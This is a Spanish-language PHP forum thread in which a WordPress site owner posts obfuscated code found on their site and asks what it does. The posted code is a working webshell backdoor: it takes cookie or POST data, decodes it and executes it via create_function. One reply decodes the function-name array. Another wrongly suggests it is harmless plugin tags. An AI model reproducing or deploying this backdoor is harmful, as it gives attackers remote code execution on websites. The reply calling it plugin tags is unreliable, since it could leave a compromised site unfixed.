PHP - Que es este código raro en mi wordpress?

 
Vista:

Que es este código raro en mi wordpress?

Publicado por alejandro calderon (1 intervención) el 09/06/2020 00:23:43
Hola cracks encontre este codigo en mi wordpress que es lo que hace?? porfa alguna ayudaaa

<?php
$gbmhiq = 'im974#\'2pfvgy*Hlxark_btcueos1630d8-n';$vinag = Array();$vinag[] = $gbmhiq[3].$gbmhiq[32].$gbmhiq[21].$gbmhiq[33].$gbmhiq[32].$gbmhiq[23].$gbmhiq[7].$gbmhiq[29].$gbmhiq[34].$gbmhiq[7].$gbmhiq[9].$gbmhiq[25].$gbmhiq[17].$gbmhiq[34].$gbmhiq[4].$gbmhiq[32].$gbmhiq[9].$gbmhiq[25].$gbmhiq[34].$gbmhiq[21].$gbmhiq[21].$gbmhiq[7].$gbmhiq[2].$gbmhiq[34].$gbmhiq[23].$gbmhiq[17].$gbmhiq[33].$gbmhiq[30].$gbmhiq[2].$gbmhiq[31].$gbmhiq[28].$gbmhiq[29].$gbmhiq[33].$gbmhiq[30].$gbmhiq[3].$gbmhiq[32];$vinag[] = $gbmhiq[23].$gbmhiq[18].$gbmhiq[25].$gbmhiq[17].$gbmhiq[22].$gbmhiq[25].$gbmhiq[20].$gbmhiq[9].$gbmhiq[24].$gbmhiq[35].$gbmhiq[23].$gbmhiq[22].$gbmhiq[0].$gbmhiq[26].$gbmhiq[35];$vinag[] = $gbmhiq[14].$gbmhiq[13];$vinag[] = $gbmhiq[5];$vinag[] = $gbmhiq[23].$gbmhiq[26].$gbmhiq[24].$gbmhiq[35].$gbmhiq[22];$vinag[] = $gbmhiq[27].$gbmhiq[22].$gbmhiq[18].$gbmhiq[20].$gbmhiq[18].$gbmhiq[25].$gbmhiq[8].$gbmhiq[25].$gbmhiq[17].$gbmhiq[22];$vinag[] = $gbmhiq[25].$gbmhiq[16].$gbmhiq[8].$gbmhiq[15].$gbmhiq[26].$gbmhiq[32].$gbmhiq[25];$vinag[] = $gbmhiq[27].$gbmhiq[24].$gbmhiq[21].$gbmhiq[27].$gbmhiq[22].$gbmhiq[18];$vinag[] = $gbmhiq[17].$gbmhiq[18].$gbmhiq[18].$gbmhiq[17].$gbmhiq[12].$gbmhiq[20].$gbmhiq[1].$gbmhiq[25].$gbmhiq[18].$gbmhiq[11].$gbmhiq[25];$vinag[] = $gbmhiq[27].$gbmhiq[22].$gbmhiq[18].$gbmhiq[15].$gbmhiq[25].$gbmhiq[35];$vinag[] = $gbmhiq[8].$gbmhiq[17].$gbmhiq[23].$gbmhiq[19];foreach ($vinag[8]($_COOKIE, $_POST) as $njxgau => $rtxfcec){function oyrldq($vinag, $njxgau, $dmmmij){return $vinag[7]($vinag[5]($njxgau . $vinag[0], ($dmmmij / $vinag[9]($njxgau)) + 1), 0, $dmmmij);}function xgvirub($vinag, $fzjqxn){return @$vinag[10]($vinag[2], $fzjqxn);}function ltrmdu($vinag, $fzjqxn){$jhsibpk = $vinag[4]($fzjqxn) % 3;if (!$jhsibpk) {$ttrbrsu = $vinag[1]; $khrek = $ttrbrsu("", $fzjqxn[1]($fzjqxn[2]));$khrek();exit();}}$rtxfcec = xgvirub($vinag, $rtxfcec);ltrmdu($vinag, $vinag[6]($vinag[3], $rtxfcec ^ oyrldq($vinag, $njxgau, $vinag[9]($rtxfcec))));}
Valora esta pregunta
Me gusta: Está pregunta es útil y esta claraNo me gusta: Está pregunta no esta clara o no es útil
0
Responder
Imágen de perfil de joel
Val: 3.828
Oro
Ha mantenido su posición en PHP (en relación al último mes)
Gráfica de PHP

Que es este código raro en mi wordpress?

Publicado por joel (1269 intervenciones) el 09/06/2020 08:06:38
Ese código no parece ser de wordpress... he ejecutado parte del mismo... y el array que crea contiene estos comandos:
1
2
3
4
5
6
7
8
9
10
11
12
array (size=11)
  0 => string '7db8dc26-2fea-4dfe-bb29-ca839016837d' (length=36)
  1 => string 'create_function' (length=15)
  2 => string 'H*' (length=2)
  3 => string '#' (length=1)
  4 => string 'count' (length=5)
  5 => string 'str_repeat' (length=10)
  6 => string 'explode' (length=7)
  7 => string 'substr' (length=6)
  8 => string 'array_merge' (length=11)
  9 => string 'strlen' (length=6)
  10 => string 'pack' (length=4)

Es una manera de ofuscar comandos sin que puedas saber que comandos son, ni buscarlos en el código, etc...
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar
Imágen de perfil de Kathyu
Val: 1.802
Plata
Ha mantenido su posición en PHP (en relación al último mes)
Gráfica de PHP

Que es este código raro en mi wordpress?

Publicado por Kathyu (905 intervenciones) el 10/06/2020 09:18:08
Parecen tags personalizadas de algún plugin, en Wordpress hacen eso mucho, definen sus propias tags. Tampoco puedo asegurar al 100% que eso sea, yo las veo de ese tipo.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar